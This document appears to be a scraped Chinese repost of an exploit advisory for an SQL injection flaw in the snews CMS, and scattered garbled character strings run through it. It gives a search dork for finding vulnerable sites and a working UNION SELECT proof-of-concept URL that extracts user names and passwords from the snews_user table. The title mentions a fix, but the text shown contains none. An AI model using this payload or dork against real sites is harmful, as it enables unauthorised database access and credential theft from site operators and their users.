CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
2 H. r5 X' t" s5 o( @作者: By onestree
! a+ I% [0 f' U: m) g# o/ k下载地址 : http://snewscms.com/
测试平台 : ubuntu 12.10 / win 7
+ r/ A% U; d: l% D关键词: inurl:"tanyakan pada rumput yang bergoyang"


# s8 _$ ]; x3 n  f+ W*************************************************************
/ V& v; `, Z' x9 h5 Q
6 X! e0 m" d) q/ z& sSQL poc:
! a6 _7 z0 A  a! q. U$ E
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
" I6 f( ]- q" _
示例

; z2 J0 D( x" d; J6 qhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


) c3 o8 C  R& S致谢:
, l# Q! H2 K1 s, \
4 B& {. x  h' l( i3 p" M6 m  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
     
          indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*